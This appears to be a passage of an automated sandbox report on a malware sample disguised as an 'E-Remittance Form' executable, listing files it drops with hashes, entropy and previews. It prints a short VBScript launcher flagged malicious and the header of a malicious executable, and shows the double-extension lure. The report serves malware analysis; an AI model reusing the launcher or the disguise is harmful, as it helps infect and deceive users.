                          Preview: 9S50Y3a6FELYQ6458e6IF1krWdeP72RC9yN3FkM721Wk020J563..B73SM054x6P353021KU98s5s1hXLQxD7mWZ21ItncTo8n3WvXPjHOQT4r4yn1jPy9cgc4uo14X2l8J2K436uZC0546181082n6S945j..70ammO64kA9KBJ4K03wj62Yct72702ky..c1pj6878fjrcpZ553ev0q3zY0600600Oso083Q2r3peP13B279zQqlUqL1F1758yQtR3O3a9C98QKJ608Pta5a3w28tG82Y425G1..chx7CqaQ1a61C53NAcq92088i66RHPM389T01J66W5440q4446xn3U1ws6RW85671894MsOonr02JiW9rrDb18017N..Gf1685J5k557pw08I4Kx491642821Le60cE94701N2E095E6948UFy9L4s3pG6ysByHL1B623B6J12fvBb4Wq7x..8c6j..a1426e8R918Ij95W0s3FZ73sm91O4676Hh603LzeFZYwY1S51v37diIW4L330E4Qpn2485Gk71au78K0UnZ517Iv80Q0n5tb03A7rT2Id9JFk7mPHhz..
                          C:\Users\user\AppData\Local\Temp\82139548\kvfbftnru.mp3
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):609
                          Entropy (8bit):5.579508725342047
                          Encrypted:false
                          SSDEEP:12:7xe5IFyBA/Iv6+TEcR1HIevQIjVCSRh1EivSVmUR:IIF/+D1HILIj5RjNKVR
                          MD5:3995C00C683ABAF23AE16274E0E84A2E
                          SHA1:0DB8A0E5AD441ABAAE7ABC1BBE6F99B1E05B6D48
                          SHA-256:E98C5EB50F09EE0551A5032D91953CBF960F957F9C3C653E9E542F43D8B067AB
                          SHA-512:0D14D57560CE01E112BE1DB21DFA066F3CC1BC2C1C7F9BC4CE5F6B3F6BAB519F4570C9F03BC1E2F16093C3B006989BF072CE496E91E45D803C232C3C93831C2A
                          Malicious:false
                          Reputation:low
                          Preview: 600Q663w9e85ZI545fw715Wb5..3zs327583TLd43A8lrMU40P3098pe9Z580raeF7AMjgGKh0Ii9B1Vm2D10391Vq01560I11n2S128rB52j460q301c0W12sHN0m9976aClWNy8RcP91yKK0Qv281W41lX5526V5da2b4h9lpvbK..128eIK84x45x92542TZ5e4D4ZhxGJYdzMG099KkF9emIV9780FyeLfX8dX0FTX2L9B3RvF58c278kR6SXo7r48..V32Qq773Lo4t5c6..VC8qaqM9Dd1Wy6XBET3uGNH8KHz29n1K0NQbh503876ly9k6hcT02FA8HXE1742oiJSi7iKG3s8q42rqS77608dh03R5I4..0tni8FA404cd8ltPoX44Tck57D94YN71qu8e310r4U8Y40r4a6u6mW71Lb9fB09y431K0Bw05E6991YLl1fKoBMg100EMb781MR17cSP0Mf..fKS240YGL57Z8bC33iPnU9uq3rBQ60k9j734I25SKd92A23a7SjV76xx643Bn7IDu056J5LK85N56wp6QEaGJ9Fs53VU225UkY8yED56pLG83KfmCb6i1n65U..
                          C:\Users\user\AppData\Local\Temp\82139548\ledpu.cpl
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):583
                          Entropy (8bit):5.452460739145846
                          Encrypted:false
                          SSDEEP:12:OAqaKucRSoJDYJlN4UznyA6Rb6srSiT5H:OAqGh4eWwsrSiTx
                          MD5:A1563EA76BB076ADE23C8964AD9D8A9F
                          SHA1:279087601847BD60F01AAFF79DAAC385649A7807
                          SHA-256:E0E570841AC7D8611AE4D04E6D50933A2651041BC3BFE07299C2280EA08FEA2D
                          SHA-512:0BF0C2FD38A5C6499BE40649C9289BB47765934268DC412A7FA868B8C4BAD10A1DF6AC9E25B30F095894A1003B1909134FC24AE4B06C6C206AC81DAAB8114FD8
                          Malicious:false
                          Reputation:low
                          Preview: r13C3j49..96b24O..Ywg4P0b0N2889CY9a899y7d3835W9D6YZ9bMkZAoO7a86z58bc7L95b23VyRp14Qe1IN98pkq738jPyg0d01hV96516I5I..205l47d9y09368No4KH0g8Jo4CN8wSJH6eM4xM0Gac12ads6142FW5j2F16FZ920192DiQNygum8VV118W608rPY5C14614th0DP5ys26K213Bfq355C0ea3jaPZrdEnrL6Mywf82KN..OHbEX29hK2gu9PF0y75I6j016K3gtc4o7K2LsZHN79XnGR..oBF986K1j8Ids4908Cuc1MRW3b2170V35990NA292Gp3c..i5Kj38Bj800Y2641R74T89Y1e0d258Y73511dpRR5R7..7M6z1783f15F98384oWeD..672QU3e5KSJJPLDC50Fu1FkW8488o9m695415gba54S0nP30Gh7g6T78ZCp392j7494o3P20Y94..mK0349511661sHI4b93Q588W62uzASs303r7LLf3P46f5G84q471YV3hM0v2t59GN78z680R841654en9Q9A0j..
                          C:\Users\user\AppData\Local\Temp\82139548\mibt.ppt
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):517
                          Entropy (8bit):5.577691894994689
                          Encrypted:false
                          SSDEEP:12:jbPxuiUCHHWh8g3qRyPXRX0ukC5Hp/C5tMgv543NLOprhVi45weh:HxVH2h8tkX07Pt57rjDlh
                          MD5:18BC4D9E0FC1B64E7ECAFCCEBE8FF1B0
                          SHA1:E1AAB49B15223B7B28DF4B376C896AF975D60D6E
                          SHA-256:1E17E644516D5F59C0BA1C856B6B31C8AECEE8ACC7CE092BE36FFD0637E08E2B
                          SHA-512:D29E3780F6B0A73BB1750855FAFDBD278E5524B2A8E73AA9EDA640C355ED7C5183917799201CAA26BDD5021564D87403DCBB9F8CBBF4FA87147D9DBABEEB5C69
                          Malicious:false
                          Preview: lU1hB8v2121bC55Ut07ekzxM6wX5Ej16G29BK758748Fg7s12Gf9..mQK12SDs9oPOL0IX05617ij79STO7K9PjTv3KEvIb5SE5Jvm025183F922DEsXs84C0o648M73Gq445v015joQM89cnn04K9Vu64mK0185Z043N26490mw7Tc7543310BM7x6isH2A3TWUz0i992YS1d2KIblr153L0h1t..3Q5MGr6VW8ZYY6pn3q7UKK1934898IYp..yuhRA3oY044W1g3p2320hiU3rd4c9062I7..71Xy12xC8i0t3Rmz17l2wqs85rN10E20TfR0W4467WaahG1Iu37Z51XBfoiI2XB6nZfJXjgt85FQk529t5..iy3YDF55m1G25AstL8fXu1x1dueIC3tx07ZM8hex60M463L9DGs3IZ1NFVqcN8xdI6Y9R29w04801581oZ4l0s755WcQAV1gX1572mrw357QJw46..0V1l1d30WC678I9W8a22em9oR..
                          C:\Users\user\AppData\Local\Temp\82139548\ncplbfrqpr.txt
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):518
                          Entropy (8bit):5.509377507232657
                          Encrypted:false
                          SSDEEP:12:5rEvOmPSPK6dSwh6J2oGvQXxGcRXNU9ZCyLgV2FdI4h4VVANA:lIfOdShJbGqxGcx63rLgsF5WeA
                          MD5:0B8AF5DC59BB7CB4FDD0B0F7AF3757DF
                          SHA1:C44F230525060FBA3C9ADD285F7801119933A796
                          SHA-256:1E46A71EF3CE0502278DC55F187B52F23029FB0B55A948A32D3E28E439A82812
                          SHA-512:D6744FAFCBEB11D7D6A6F58E88B9410F4E4A0E18C08362E14F39534E6F553C4E657BC02C476AAF57B6357E5C1E224D4F3AB125028E11564C4B43EEA1700B19FC
                          Malicious:false
                          Preview: 2E8xGXD0fLj1ir0830m1Et6365JK6Nym46h4824o3O0dDZ35TF66775Mjo0rp8fCt6939yD9a54imcJ770x74Mk5M16E289..7Fo9rs6989Hy5v6670I8g3DT9Ftl2868rhF5FgV760806989UnJO0qi43bA1rUoVF9Xh53Dxej76Og11092CYtX7e022bf4CpB893YYXgvyluHa798sr70855OQTnC4zi3Mb34N3j850V086624n5x710h9087Q590d0r9GO39..j39A0Y21ljROV69SHXWn9949bQOZNTPL632j0816270n373002N55eHtgdRZ73lAVVdcA792TzO5422843DI98bD91YrW5133pUw345Btuai5T17zGEQ3C3096u2qa7802L7ZOz8FL02F3suC2OyU7LUT..Xc14XY85AEGTpg74665WL4xqTLrw3ur7854iw72jY375oaOj3N..Bg9jo8XNhvgr2XPVG49A02448lP51qik8T077UZo..
                          C:\Users\user\AppData\Local\Temp\82139548\pojm.ini
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):545
                          Entropy (8bit):5.467162535814078
                          Encrypted:false
                          SSDEEP:12:M2GC/8WPHJGcXPnupWMDYfvd21KXbawy1HXcD6bbfjDQ7BXVnn:1GCJYSWpWMDB1MadKyfXQN1
                          MD5:A4DD3AF5059AEBF0C30F2C56E4CA5164
                          SHA1:0728B0DBFF92F39DD62BBA076F840A3CEDDADEB5
                          SHA-256:7BAA9365B05C1D1A6FAA2366A8947AA8BEE7F1029B4503A1430C1BF18B10AA34
                          SHA-512:2D446B221C47D3CA44D8E55517D83F1A7D38F7C4EBFFB3E270EE46155142B2FAB37813C0CFB0DDFC5E461A64DD775F94E6A725E6733FEB3B80E443CDCF926520
                          Malicious:false
                          Preview: FS2Zs3f3..m527217xm5Mxp6V9ms29tQXXvA3g8wR26Gf2486l7fZ93hJC2Ac6uYe995XIF26P254IYKS4lzy3767UGthk18Y3Li..0tlR188c3m51nZ4Y4k316t9Hm..17450Z2CN34539dY8036B0M482E604v70eu4G9021n222C3I063K97118qN8Hk3W97R583rxEyeR5kqRyF4PR382f6..8542liv3yz92WZsn9d1gCN73oFG44f3E6AecFZ6lM3zeOk231Mw60I78d5563z7005LHK4P017V2R56R08G7490Wnixm2563Lge6Y7g5V4d58R1QU8D46n85u09OZo844I3cV711f..44101E52W12768690G53qay8DMq9Kp01jY73p47n45jGs3nbKX3417v9O..t23j1ESR4O1u6V66Fajb932d49Wb6Aj8t81..2jVX4150Np1Fr31236KNz51a32mC448cVXXsrHSn5x50V50g39r2z4YpTogfH5iCMCQ559h331z28Ff43olV34V..
                          C:\Users\user\AppData\Local\Temp\82139548\pqbfmorxw.docx
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1183730
                          Entropy (8bit):4.173093630730597
                          Encrypted:false
                          SSDEEP:12288:U9qJojg1bG1qxYtA3/7Ulx0Q/WNfK5Fwd4TvnreBQPkA/Z5RYN8LN+hcGx2urb:MH2uw7pQ/0fd4TvauPkqzgb
                          MD5:545E57CC8251F56FB77DDE769CB11C97
                          SHA1:342C79300E6CDF7644EDA1C72FFDBAA46BDE55F2
                          SHA-256:7679BAF73789098BC9D5A04C82DE4B5CD2AB209A0B58F9ACE561F50CF1EFDAF8
                          SHA-512:5B03F06E530B17035E2D28E8EB2B4CACA30C9ABCCD0C100261B0B5BD51BD8EC3A08A1CC36945DA9E7E7AA408CFA393D0A310E175E07013DDA9ADE2413638D25F
                          Malicious:false
                          Preview: FC5i133DE..aH0G59ioQ439qgQ8d35q9Dbc1672ceLPLd5..80r686u46..drwd2teq80Lj4mjs9b3Yr3pQ6el63Q98do1D8jI14XE..4Bi939d8ZhJ8u1NneWq1i601g45u771nKtW841il20oHaY8V99cvNuIM1xz1rgSE5T020J8EW468z3LdrX85sYvu66P6..u98sfYg3d6M12ca1Sm25W8Z44a5q18I1p15PYu4eZigX7Zz8UOa3702943g046Jfm11z0078s..U27IICMS5GEA5CU9r2d27j1rE17i9wC5M5Z1m048uf29sI1I1Xz303NlK3L33vf67PNUN8De2SLBA01..Lx7N7s38tbf75th83sR1p1034K7Z1YYpV6q7357b2imX6O1Lrp7338e1O09te3b0z1q2UpS5..7g14Wkbx14u62WrJ2689Oy67L77o7I1W7Ff65658E92..jzZU159633sDkY0ndn4hjt0tDq3R6q7207NU1WR55v7M5840..QcN4Dy0a6o5izZp11Z0S908LU56K41B3zER99Q80jD9tecv..1U185a399feP354Oe1N9Q0YSIjf924160FP956Gx..2I46kS6El695Q577CP95sP09z9744zh8kc8D75zTQ2Aj..dF53A2A48iq7Lf75953sh6NPV3..Ha983iZ740188xj60m3Aj743hU9H9n581v80..U390g61uG0saZwGntV5pviLdE2XQz5z3520z6a4WY6Kl..3Fa7p6PpsnX5az2y6Yg0B194t6Tdsq9WOlb8HPY9IK2h2C5Ul4V0L92uQ3396bVP0TK43T5RWP870RjS9gP8e1Su11H..m74osL906203f338s6cW6aj737gtKWB1g478E9o7P70VMCl4108miy6u788576357v2..F07iMh9h763A8rq8EdWo82F54u1phYFP9376y4548DfIrS435..r2115fmcj3MQ1x3
                          C:\Users\user\AppData\Local\Temp\82139548\pvvrt.ini
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):606
                          Entropy (8bit):5.4640654918354326
                          Encrypted:false
                          SSDEEP:12:gQ5UVx1yVs3N+VQbL4rTwtW7FATTecTVqTjKeeA/YngJzwJMSPS5krov:V5OzaCN+sLzW7WTDxq3KeeA/Yn+BSPY
                          MD5:6A2411B573ECBA959EA1FD48109FD0A6
                          SHA1:FCF12012579E72D3E64DA520A0E76676E0B3D493
                          SHA-256:249752A301B6EE470D127FCE1684D58AB0546ACAEFC8C9CCCC989E6B49D010AC
                          SHA-512:0FCC44D51E520FAAD763D06D93F667E4415B43C90E83CB82CB09C1AEFB88FD8156608A95B602064C1D545FCB52E09E1BB198ACC12AB1481BC7A5E1BDEF986D9B
                          Malicious:false
                          Preview: y45QD105S35979448QC30..c3016AIX5aY9qC45q29y3T3HN7Ivc5G6Tx3uF93Sa5ZtqNnE7i52o5S..6t61U855r2ir104vDEr0Sjg4LZhmBo2E515mQK97C6aC2HR58157A16v7tdl540XozJ2T552st30y7R48N01cn222Gb4H27GnK60ugB4251d53n06N7tJhD2xH289770sA2Rlh20xkTX8n6J87m64AH54T5033..50ww6Z8Vk37X3M9ghhhe24D12Au769796C54Z2..b1s5VB54fqf261pYPTiKTQyEJH3TX141l8fH8M36531125OH2626yza845UyeZW02230511411V9M66Fa98T0jHAN163..w0Ll7hsB8fne9ur7282kgXXI68263E192GQKT5Ff6Bg5608y8B0y1OE7h3KJVHy493G..4657E4Utcon6029l9TgQFe84..dc24x4294SrJ7582081X7i3L28jrS8z1440vSR8lE21y355GB4m1o33j896U4t3fR1Zx8418zTSkWo799ryBg4V43Fym6R5s16wXAEQm1F1784qZ5C4548G16d54Cjd710GQyz4..
                          C:\Users\user\AppData\Local\Temp\82139548\rnjidsxil.mp3
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):576
                          Entropy (8bit):5.443753737781502
                          Encrypted:false
                          SSDEEP:12:p2FRxgroJLu3PUWdaFUwsroryyVmCmn5MGbpJAcSaS8SzDtAQUByc4:iwc4iyZroWyVmvSG74aSpDz8yc4
                          MD5:398B0A5437BA24AAC3CA3E573360F9B3
                          SHA1:097C4D23BC17BB1C670C2D5E91E13E4BCE5B1405
                          SHA-256:8AEE1198832808676ADE13F08E17B01D07A91D69C3B88B6967516E7CF9256635
                          SHA-512:CA7B9161F63D4BB7939315A4B2A1D2336E604B5E1403EFDBCEFC74A6464090CB874336B9754ADFC25E9370887CBBFFFAABB17C3BD0FE1F87F7ECC9DDF6CCB937
                          Malicious:false
                          Preview: 3HHI09vuq31zo19XXD9DAT820KvXHJ0431UuV808ywv9257347lH072lg3925k8Xaz1O71M5S14217KdkOGAoF64728R143Mrh5cH7Ln37322v1n247LtcXMb6SRk..I624l2wgd926z14192re44ND68829C48R836XBs8200Kv5m8aV1Z36PM9zz86O1iK166368Q424UpKZb2ncC3SMBx2UmE4l19SRf1F60083W4w..3z26610ZUvHU6AMZG8aW6p7W51155M2687cS3a856H0..9i1WKuzb86C1578432fpM99UfF2Esb0k00334bTq246lOy296529o0QNK942aS6s995xe434Ws58dizfI25366480f3C8g38A0KisTxOs256g89mx91i5QvY4975ZTuZ4q0z3U4E67s0x..w2V612TlQC66..E74KxS5i4T6ml0S3ZUlX36A2rN121Va74eE758sW86yY3n97qdQP3Y44w1h9798kyTd3rs8f9W42SWUoA6r8z8sM3q451o2kG28IP5G820222BE0u0X3Z7VZZr1i05r4I1Z6N..
                          C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):104576560
                          Entropy (8bit):7.097392671031914
                          Encrypted:false
                          SSDEEP:12288:mGaSGa+Ga+GafGaRGa7GaqGayGaLGaiGaKGaoGa7GaLGaJGanGaDGamGaZGatGai:+
                          MD5:5D32075EAAEECB2F209ED24D4676AA39
                          SHA1:F0913F914AFB1A9CDAC9FD48552A22376EBD5A25
                          SHA-256:AC616BEF1065A0D60C7731DC2AAB0B795D4471239B6ACBA9A301BC1290781214
                          SHA-512:5FF5A1B573913974F5E47A7E749C24EB16EABBB58C0D40297CDCF0B6AE3A324772626135E1492815185095964CB5D8826714F01F8F4BC090B6E527A25B4DEB6B
                          Malicious:false
                          Preview: ..;..`$....)4.S.i......#.c.s.&..........9.{v......u'..C.6r.&J..x.mTFXg.....;....{p&..V...F....y.4.1.7.m.2.a.6.i.k.9.7.8.1.w.n.8.O.3.4.0.h.6.6.6.A.4.5.8.n.1.3........g..<.B..n[.!.....-..2.;....X..!!x...Z..C..#....f...N..$...A..j..wg:.):.<...0.>..H...._F.TP3R.v........X.V.4.9.L.7.8.b.7.u.y.3.8.T.C.1.7.....r.H.j.q.V.5.A.5.9.B.7..........yJ....-+.L...bX .{S..:....'q..wBM,oIGE.*8..4>...F6..'.......R...>XrNcZP}.T._.tC..........s.s.Y.I.0.9.4.Q.9.3.3.7.9.2.s.t.7.X.1.x.0.3.Y.6.C.U.l.3.7.L.F.1.n.F.9.J.2.7.7.5.g.D.f.W.....trnB...x....5...16..I#.....RH.)#M........ML.1.+.E..W\........7..^i.r..-.\g.l.J{.}6..kj...[..Z<..r..j..T..r[.$.#.!y..r>x_.Bh..;...,....?.I....tyT...m>.o.7d...Qs*...8.......-.%.G`.r&....s.P.3.6.9.L.3.7.1.I.3.8.2.3.n.0.Y.e.6.4.6.9.N.Q.p.1.Q.6.3.H.x.6.8.m.W.....ss..g...;.....^M.W.k..b.f...l.Q.}<<...../....|....-..u...".7.[g.UW..3..XEN..L*v....w....+v...s.cw..H.R...6@..<.u1...qxcqj.H.uR.S..X4..........m......I.....BDp.o....L3 d7-.....%.......X.r....|$...?.>
                          C:\Users\user\AppData\Local\Temp\82139548\run.vbs
                          Process:C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):88
                          Entropy (8bit):4.6051756194659905
                          Encrypted:false
                          SSDEEP:
                          MD5:CDB722E39D2AFD726FE91A0D3A540E8B
                          SHA1:8EED8DDC0948243039A2286C19317EE58F4DC28D
                          SHA-256:B80412F79C971F1E886247CBBD553951793AB8A3388C8A81EDDE54C555ED3666
                          SHA-512:E5CF20D6DB82DE3A53D2AF4EF1A917D0922D111BDB5061408EEAB21F31D6F257E2FD0FA8EE1B1D40260489DA7DA34D0558095962DE4FEDA8BA34E6551A426E6F
                          Malicious:true
                          Preview: Set WshShell = WScript.CreateObject("WScript.Shell")..WshShell.Run"urdavsa.pif rpgc.htg"
                          C:\Users\user\AppData\Local\Temp\82139548\rwvkj.jpg
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):529
                          Entropy (8bit):5.405323351479462
                          Encrypted:false
                          SSDEEP:
                          MD5:0FCF9A109B3EE20CDB79E59015830DFE
                          SHA1:C2E1FFD870CC57A61EA2608DD691FCCBF04B46FF
                          SHA-256:02B8CB179E2F91F15AD5C1D79F9DD326EAD86A3BE5A8F3ECC53CFB1AA9A2CB43
                          SHA-512:89233BD37626B44D53FFA150CB7E377C5A0EE3C5B3AF40CB95BC5DB511A69AFDA54075C264C0B3E5E9B291758D66A9A87BFEE454E105A453B348DE73F6F02817
                          Malicious:false
                          Preview: D2H42r56l925273967OEU34AJ7d6X2yW3583..55d509cH4034DLk5Pj998S4Gq30201U1uNQ94s5z1GAI95nBKs4Yp2080N68DWM3s842OEX6FMnmDX6a19vK51g02h16lF07qg99..x364P87a6mB7G71hw52z426H21Ij4Q8Ow9bY2lYg..0gKy1u9o232fI25P5BO5802WW8y1T5j8V83rmcZyLSi86v0492RF35801808199169R73838dbS47649o8c97W1..8187VP97m0b844n61LXL999MRUQBbj1lw2ymk78..M63676K4M45K6F7V759sT40ddFL3p38RQI8pL1jx7cb5..1A65YS0zW0361f71EW5U48W2N4yg3n3614Kl1D37Ia58Z27DM2kgf898009nI9QCt1naa9leu9xkd5q395Ij0Ll4FG8A3H854304W63t4wXsMOf60dz94i747Ubt911r0dyxu9p44a0x89848258I24080b10240phWk4sNkU..
                          C:\Users\user\AppData\Local\Temp\82139548\sggjqlvp.ico
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):684
                          Entropy (8bit):5.448992123973903
                          Encrypted:false
                          SSDEEP:
                          MD5:3BCFFAB29A55B49F02607D6FCF61139C
                          SHA1:E6B260BF6C2219EAC6F0D03428B8B7374E5F7663
                          SHA-256:872BEAA2956D41732F6CEFFDA078F288A39B963174C9D4A1EEBDB40047574A01
                          SHA-512:2ABA9382FD064A1BCEB6C08D13E73D58700B7F991E9BD576F7C700D801849B29BE2AD82E4CE3654EC35499F89D570E7BB6D561AE0B44FC4E1C0DA35E72FC51B7
                          Malicious:false
                          Preview: C97Q6a2y35i9859iwk..Wu313635285R1Zqg7n4ASp75N256taU4gr4LA6SRpf597D427q8aBkCb4z7303Kk0324130iw77qE2R..84403UPc064viG4sf14F19e72B7i4A45942b14PX0t828jQGa4EC7Q67921XKys7123d32trP59a69SzMk90y9xbY5Wx3M0L1XL2P3rp13LMg59..b2m9EwI279T2v8E66RN0l4G0bpz1w869O9b6E3U8e1Z67C44gpF6885r0411oUL3472039453YDP5cfWKdn8Kr50k..143H15..2G29R2UC1J8s..dQt9Xido82Ky5Uu6BVi96f557iR722Qo0H0VJz7919Oc31P2257c1767K3o7n5G6..UXK433H92976q45033rP0zs522C647ZQKmOtvaMZ13j8AgCZa6h1Sbd934nP9u5UqYOB6fC0LZABus8S8o7XS8UQ2599A6H64ac01O7ck..80nJ9A19D1Up3654F3c98ZYoV908Sw7A6P7hL693FY404m2PA5263u4dm5934Ld5YW6724010181l6w58u3K56AfGK9h9P82kSRKmDl1kJ801P3D561V15LP0Of4NEcSO75l568j29j691EI566Q0Td5359b307m7817B0j8MT9003PP6982LC..
                          C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):662256
                          Entropy (8bit):6.573686718539873
                          Encrypted:false
                          SSDEEP:
                          MD5:CDBB08D4234736C4A052DC3F181E66F2
                          SHA1:6801A805B6DCB760E8BF399A7D3AD0489FEC7BFB
                          SHA-256:07E5F6D7EC7CCBC3D742658E9161D799934C6F7F6A3EBF560F361B4EE1730B6A
                          SHA-512:1EBD1A546E64D4B36D4F143FF7211D953F8DB8E74C739DB5E9C0939A6EB010A461FD1368F8A7813A8A2DA804DE6993010075AC21E4917D74D3F9394EAEBAFDFB
                          Malicious:true
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 34%, Browse
                          • Antivirus: ReversingLabs, Detection: 46%
                          Joe Sandbox View:
                          • Filename: Notice to submit_pdf.exe, Detection: malicious, Browse
                          • Filename: New Order No.0342.exe, Detection: malicious, Browse
                          • Filename: Notice_to_submit.exe, Detection: malicious, Browse
                          • Filename: Quote AUG_AQ601-LH7019B_Docx.exe, Detection: malicious, Browse
                          • Filename: AUG PO-HN512201811,PDF.exe, Detection: malicious, Browse
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................p......).....@...@.......@.........................T........2...........D...........c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc....2.......4...R..............@..@.reloc...u.......v..................@..B................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\82139548\uummnexccu.ini
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):518
                          Entropy (8bit):5.421084621909537
                          Encrypted:false
                          SSDEEP:
                          MD5:28632856AB37779B2BE85A9F6482747F
                          SHA1:9B473FBDE596F68A6670B3663AE13FDE02F0B8FB
                          SHA-256:AE08F906B87EFC7475D9D9A75B6CB95278A59EC81CC10A40F9E191C99732ABF5
                          SHA-512:1DA6835A4B366384851937E246A2F9051F78EE4D94F999290B095FCB9CD4669912D62AECBB51AE42F6D4B1B67E0B74B9FE62BC442C2AB5C08A134C36A30BAE7F
                          Malicious:false
                          Preview: EPS4t59X5285j55jyw2381d63W393Z2Y18JM85I73fTio37100H44200Kh520sK3712xk3Xj34451Z1I1x6132beK10q58603hYjijn3L73uCk1B0440fU6M8y381G4611lf4n..7Qf8X94y7107P5W897Ui06Q10..55sObbFkyC8179RDUg3u6tpiQ9x8q09J062Y5o0fP717qHp5B21..vm0s818478E916S67D0k..26OKGyHGMod54WYQ6WT867Cb42135vIUk5yAh8T2g02icE6eE1yOYO78A4rDSlz7JC2x56s30QiGa08I..QDYA37B1J1gH0e95qH4FP3LN74733078PAR3Y15NrKX9I346F4gH4eW3SH12K7x1OItCy..498v444U2vC5h20KWP309935116ofFx36BBobxliuH71671a73d083h9k8O5Z0596435Yy40QF9tsPe074176l19Ci0dLF3612UI7f2E8c85J8Z19oXRCn03z3388..
                          C:\Users\user\AppData\Local\Temp\82139548\wdav.xml
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):565
                          Entropy (8bit):5.618694035615005
                          Encrypted:false
                          SSDEEP:
                          MD5:7188C2DDAC3FE15E2B779A3DF36E0046
                          SHA1:C03D1675326D726B14ECB4EFE2D7C9E5B4516242
                          SHA-256:F4198D2447BCD0A3C4CE6187A9E879DEF55839C4B78796A179F6E95DAC90F79F
                          SHA-512:2FF433C18C27C3D088E6908D77D38F6FDD2CEE325D7D3558256EF7952790516E5426FB99590F50487201D225B9BBB3141BA99F06166994365B6F206C7D0E83D9
                          Malicious:false
                          Preview: NE15..059g42J7six1S4Oa8t52b2N5tzF066cI5X6..G2fOc2C2mjJ62u8DTyfk084wBco8KHn20FX37R92Vcd90B64KppO95T12P55YX1n940x9JjiP73979RG..XXFo8q6FyPkd3yL9d2zaiO5e1lz83vhW..2R7UB9389be9tK1f79P6CZp7EyR8qHY183z7pd9101h2Y76jzRn882s5iS03m5Vbb546C..5YLURey4b01uAd947Q8nkvz69e55H3yhi0KG26Gei0e3f8zxtzh92lh7108GNAwT151pJFX010w99g22RRIR44RY60cb3W32SH2hgf6..z1ggg0xh745FP7lh28o..71Z0519th197Y3..aJI4DI0c2RSXXpgdso4KAQ54yaU273D248ZiiMH14t74w2679kUusZbM598o5xBsZm7Jl1Z2A70m5ie2xJR778..6C06217oRx8oH8lf6u9fEsGNF789275QKdzYI38hIP2Q3oH773xZ32bXRe6HkD5X8G4qif6t0j8FLzgq2owBZ1Jt39ST5Y2IGv3s1Q7..
                          C:\Users\user\AppData\Local\Temp\82139548\wvjnbptk.exe
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):507
                          Entropy (8bit):5.48021842881949
                          Encrypted:false
                          SSDEEP:
                          MD5:52C468E5B63BD119D9D61B097F98001D
                          SHA1:10C1D028CB6060644D81C8B1ABE108A093454F18
                          SHA-256:0846B83011BC5C400ED8756D5E1CD2E35B33F9B77F3BA403F4A21C956F851D0B
                          SHA-512:727D42CB5F98DEACD628D76CBAC7B1A9344224A9B948BB75102367BA24551CC82274FE4F399A853AEB0C90883D3FBEDDE72860F6945C7CB137AA7A6C5DE04EF0
                          Malicious:false
                          Preview: 47110gZ7VL1u2HVtodciI3..Bx465T92fKNVr6lqD41Q384p94M7VV8IIXCw6W2..4p4P7C1Y0632j1y2vU692PPD5DLO1wc2f4j14b1Z9145iyh4T0WNn33o70JfW..6dQ1ROU87D3hnP925374a4g6o3K907Q61h6ug6500969G9608597012F1aKs6f6y24H88OdZfa7hpR9kcWF3b661c3za..t7R3A4MZVE47aIB3rhg28..24PgKQQ60235h1C71V6Ve47j8h0Dq2rZy33428Oc1370Zg4f5u07r21DT854122F337V50q8ff51K4Bt86d..5Mj4u1FYaZD4oe3h0268t4346yGyb8u1186e1O3Zv6UAjp4U306iW86115241AL9vvi0GUs295i4faXB1K024iI59lP15dfl2n18JwltR5TIUv0T8D72q14u065Lj94A0vZ80apPYxX1BLix9..CvI94401hp08sr3kSA91zaGLnu24..
                          C:\Users\user\temp\pqbfmorxw.docx
                          Process:C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):70
                          Entropy (8bit):5.000801324663666
                          Encrypted:false
                          SSDEEP:
                          MD5:E476E6BA62A9C4AE9762F8B817B28136
                          SHA1:46C94419E4D7066EEC9463DC636B15817C6E065B
